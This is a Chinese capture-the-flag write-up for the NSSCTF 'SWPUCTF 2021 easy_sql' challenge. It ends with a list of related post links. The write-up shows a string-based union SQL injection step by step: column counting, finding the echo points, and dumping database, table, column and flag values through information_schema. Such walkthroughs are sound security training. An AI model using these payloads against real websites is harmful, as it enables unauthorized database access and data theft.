[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析

查看网页

有提示,参数是wllm,并且要我们输入点东西

所以,我们尝试以get方式传入

有回显,但似乎没啥用

从上图看应该是字符型漏洞,单引号字符注入

先查看字段数

复制代码
/?wllm=2'order by 3--+

没回显

报错了,说明字段数是3

然后查看回显点

复制代码
/?wllm=2'union select 1,2,3--+

注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。

然后查看数据库名称

复制代码
/?wllm=2'union select 1,2,database()--+

得到数据库名称就可以按顺序数据库-表-列来找flag了

复制代码
/?wllm=2'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+
复制代码
?wllm=2'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+
复制代码
/?wllm=2'union select 1,2,flag from test_tb--+
相关推荐
sinat_286945194 小时前
AI应用安全 - Prompt注入攻击
人工智能·安全·prompt
武昌库里写JAVA6 小时前
JAVA面试汇总(四)JVM(一)
java·vue.js·spring boot·sql·学习
老虎06278 小时前
数据库基础—SQL语句总结及在开发时
数据库·sql·oracle
Mr. zhihao10 小时前
SQL LEFT JOIN 与 WHERE 条件的隐藏坑
数据库·sql
silver988612 小时前
sql链接的url中serverTimezone的作用
数据库·sql
数据智能老司机12 小时前
实现逆向工程——理解 x86 机器架构
安全·逆向
数据智能老司机12 小时前
实现逆向工程——逆向工程的影响
安全·逆向
sleetdream13 小时前
Flink Sql 按分钟或日期统计数据量
sql·flink
2301_7807896616 小时前
边缘节点 DDoS 防护:CDN 节点的流量清洗与就近拦截方案
安全·web安全·ddos
一宿君16 小时前
Github 9 个惊艳的开源 NL2SQL 项目
sql·nlp·github